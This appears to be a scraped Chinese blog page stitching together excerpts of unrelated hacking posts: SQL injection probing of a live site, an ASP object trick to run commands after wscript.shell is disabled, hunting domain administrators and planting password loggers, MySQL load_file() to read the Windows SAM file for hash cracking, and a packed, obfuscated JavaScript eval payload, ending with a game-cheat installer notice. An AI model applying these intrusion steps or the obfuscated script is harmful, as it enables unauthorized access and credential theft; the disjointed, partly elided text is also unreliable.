MK2-风 之谷

下面我们来看一下php注入的过程。

因为是网络上的主机，这里仅作注入测试，不作进一步的具体操作。我们首先在网站后面加个单引号字符，返回错误信息，证明该网站有可能存在注入。再提交 and 1=1 正常显示，提交and 1=2显示错误，好，继续提交union注入语句。http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1 同样显示错误信息。但网站路径我们可以知道，并且是一台linux系统/home/caiqing/www/view_detail.php，继续提交

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法，成功率为五五之数。
把下面代码复制：
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
...

面对域结构的内网，可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码，整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上，如果能搞定其中的一台或几台，放个密码记录器之类，相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了，如何在成千台机器里判断出是哪一台呢？dos命令像●net group "domain admins" /domain●可以做为一个判断的标准，不过vbs也可以做到的，这仍然属于adsi部份的内容，代码如下：
★
...

日志对于网络安全来说无疑是非常重要的，它记录了系统每天发生的各种各样的事，你可以通过它来检查错误发生的原因，或者受到攻击后攻击者留下的痕迹。日志主要的功能有审计和监测，同时它也可以实时的监测系统状态，监测入侵者。

日志子系统分类
在Linux系统中，有三个主要的日志子系统：
连接时间日志——由多个程序执行，把纪录写入到/var/log/Wtmp和/var/run/Utmp，Login等程序更新Wtmp和Utmp文件，使系统管理员能够跟踪谁在何时登录到系统。
...

早就跟相关人员说过邮箱认证smtp和pop协议要做加密，否则在公司内网，太容易被人sniffer到明文密码了，另外邮箱密码和bbs公用，bbs也是采用的http协议，没有用https，这些都是问题。虽然我们控制的网络部分已经做过处理了，ip和mac地址做了绑定，即使有人做arp欺骗后，除非不出网关，否则欺骗后网络到达不了网关之外，因此嗅探明文邮箱密码已经不可能（由于邮箱服务器不在同一网段）。但是对于我们一些共用资源的服务器有公网ip和内网ip且处于一个相对风险较高，而且没有根据安全级别进行过相应的安全策略的网络环境内，因此一些问题是显而易见的，但是某些人根本不以为然。所以我进行了一次简单的内部渗透测试。

关于load_file()相信大家了解的一定很多了，也许有一些是没有相到，今天看到Sai52写的这篇《MYSQL注入中 load_file()函数的进一步应用》。通过利用load_file()取系统SAM文件，进而破HASH。没错，在安全检测的过程中只要开动了脑子 没有什么不可以的。先来复习一下LOAD_FILE(file_name)的使用方法。

转自mysql官方手册
...

主要代码如下：

<SCRIPT language=”JavaScript”>
window.status=”完成”;
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’w(”\\a\\l\\9\\n\\3\\0\\e\\2\\g\\c\\4\\1\\2\\0\\k\\e\\m\\h\\j\\1\\d \\4\\b\\3\\0\\8\\p\\4\\9\\7\\9\\1\\x\\g\\6\\2\\3\\8\\c\\1\\a\\2\\6\\7\\i \\5\\5\\8\\6\\0\\1\\r\\6\\2\\7＝＝＝代码略过＝＝＝＝＝代码略过＝＝＝＝＝代码略过＝＝＝＝代码略过＝＝＝＝＝＝代码略过＝＝＝＝＝＝\\e\\2\\g\\c\\4\\1\\2\\0\\k\\e\\m\\h\\j\\1\\d \\4\\b\\3\\0\\8\\p\\4\\9\\7\\9\\b\\k\\k\\g\\6\\2\\3\\8\\c\\1\\a\\2\\6\\7\\i\\5\\5\\8\\6\\0\\1\\r\\6\\2\\7\\i\\5\\5\\f\\j\\q\\t\\1\\d\\4\\b\\3\\0\\f\\h\\s\\o”)’,35,35,’145|151|164|155|162|60|150|75|40|143|144|141|167|146|156|76|56|42|61|74|154|157|50|165|73|163|134|147|51|57|15|12|eval|67|170′.split(’|'),0,{}))
...

程序安装包

所需要用到的电脑配置程序 Windows Installer 3.1  支持WIN系列的安装包程序

                                                 安装.NET 3.5 SP1 (一定要安装.要不然.没法运行程序)

...

转自好朋友 http://www.cnblogs.com/pvistely/archive/2009/02/18/1392842.html 的空间  外挂已接近完成.就快放出测试版...

09年3月更新的. 已有自动刷野地功能.可以24小时.军队按指定坐标轮流刷..哈.. 还有客栈全员扫瞄.功能不断更新中.有好建议可以留言